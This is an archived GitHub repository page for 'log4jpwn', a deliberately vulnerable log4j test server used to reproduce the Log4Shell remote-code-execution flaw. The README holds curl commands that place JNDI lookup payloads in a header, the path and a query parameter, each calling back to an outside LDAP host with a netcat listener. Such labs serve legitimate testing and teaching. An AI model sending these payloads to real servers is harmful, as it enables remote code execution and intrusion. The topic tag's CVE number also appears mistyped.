close
The Wayback Machine - https://web.archive.org/web/20211214001432/https://github.com/leonjza/log4jpwn
Skip to content
master
Switch branches/tags
1 branch 0 tags
Code
Loading

Latest commit

@leonjza
leonjza (feat) log more things
d9038dd Dec 12, 2021
(feat) log more things
d9038dd

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
images
(feat) first commit
Dec 10, 2021
src
(feat) log more things
Dec 12, 2021
.gitignore
(feat) first commit
Dec 10, 2021
Dockerfile
(feat) first commit
Dec 10, 2021
LICENSE
Initial commit
Dec 10, 2021
README.md
(feat) log more things
Dec 12, 2021
pom.xml
(feat) first commit
Dec 10, 2021
log4jpwn build run

README.md

log4jpwn

log4j rce test environment

see: https://www.lunasec.io/docs/blog/log4j-zero-day/

Image

build

Either build the jar on your host with mvn clean compile assembly:single

Or use docker to build an image with docker build -t log4jpwn .

run

The server will log 3 things:

  • The User-Agent header content
  • The request path
  • The pwn query string parameter

To use:

  • Run the container with docker run --rm -p8080:8080 log4jpwn (or the jar if you built on your host with java -jar target/log4jpwn-1.0-SNAPSHOT-jar-with-dependencies.jar)
  • Make a curl request with a poisoned User-Agent header with your payload. eg curl -H 'User-Agent: ${jndi:ldap://172.16.182.1:8081/a}' localhost:8080, where 172.16.182.1 is where my netcat lister is running.

A complete example for all 3 bits that gets logged:

curl -v -H 'User-Agent: ${jndi:ldap://192.168.0.1:443/a}' 'localhost:8080/${jndi:ldap://192.168.0.1:443/a}/?pwn=$\{jndi:ldap://192.168.0.1:443/a\}'

About

log4j rce test environment

Topics

log4j rce cve-2022-44228

Resources

Readme

License

GPL-3.0 License

Releases

No releases published

Packages

No packages published

Languages